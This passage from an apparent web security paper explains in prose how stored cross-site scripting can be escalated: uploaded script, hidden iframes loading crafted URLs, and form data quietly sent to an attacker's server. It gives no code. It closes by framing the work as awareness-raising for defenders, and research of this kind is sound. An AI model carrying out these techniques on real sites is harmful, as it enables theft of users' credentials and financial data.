author image upload to the rescue! Yay author Image! Anyway, glee aside, same trick to execute script, same content length bypass, same tricks to steal data from the page (this time juicy data though), only difference is that SSL was there...and it didn’t stop us one bit. Since the script was coming from the same server, no security flag was raised and the script was assumed as secure. How does that saying go? Bingo was his namo ? The last trick I want to bring up is the idea of leveraging XSS attacks. In the above example I had an active attack that could lead to financial information. Since it was an attack where a user had to click on a click or perform some other action to request the page with the crafted url there is a chance of being caught in our evil attempts. That is no fun. So now we ask ourselves, how can we force the user to perform those actions so they don’t realize it is happening? There is a simple answer to this and it is termed XSS Leveraging. Lets indulge some thought and combine some of the holes we have found on this site. I can inject scripts that get stored in the database and output to unsuspecting users. So I can force users into any action I want. Now lets assume that the cookies didn’t contain all the login information and we couldn’t just steal accounts that way. Lets assume we can just tell from the cookie if they are logged in or not. So, we embed our script src (another nice thing about using a script src to embed the script commands from a local server is that you know exactly who got hit and you can change the script at anytime and don’t have to alter the database to change the code or turn it off). Our next step is top create a simple script. First look at the cookie, if the user is logged in then we write an iframe to the document with style attributes to either set it to hidden or to position it off screen. We then navigate this iframe to the crafted url. As the page navigates IE may pop up its "some items on this page are secure" or whatever dialogue but people generally feel safer with ssl so they probably would click ok. Also there are alot of instances where a regular http:// request for a page that was meant to be only displayed over ssl will work, again I digress.. So lets say we have our iframe loaded with the prize, now it is a simple matter of grabbing the form elements we want and then submit the data to our server. Since all of our script is executing from the same domain we do not have any problems with the cross domain security model and the prize is ours. ###################################################################### 4 Conclusion. ______________________________________________________________________ By now I hope you all understand that Cross sight scripting is not as trivial a 'security' hole as it appears on the surface as all of the simple demos people post as examples. Identifying Cross Sight Scripting is the easy part. Foreseeing its possibilities and knowing how to use it to impact a user base is the hard part, and is the part that is not widely discussed. With XSS so widely written about and so misunderstood alot of people have walked away with the false conclusion that it is an annoyance and not a threat. The purpose of this paper is not to arm a hoard of script kiddies with a bunch of proven tricks, but is to try to instill a sense as its actual dangers and impacts with those who are in the position to do something about it. As with all knowledge, it can be a double sided sword. As rfp's paper on Sql injection techniques brought out the dangers of Sql injection to the public I too hope that this paper may have a similar effect and raising awareness and helping people to limit their own (and their surfer populations) exposure. You may not loose your server to XSS attacks, it may not DOS your network, but you may loose your users, and you may be the reason your clients lost their credit card numbers, fell victim to identity theft or had their accounts tampered with. Like this paper? Want to read more? Check out the site for more Web Application Security related papers and specialized Web App auditing tools. http://sandsprite.com/Sleuth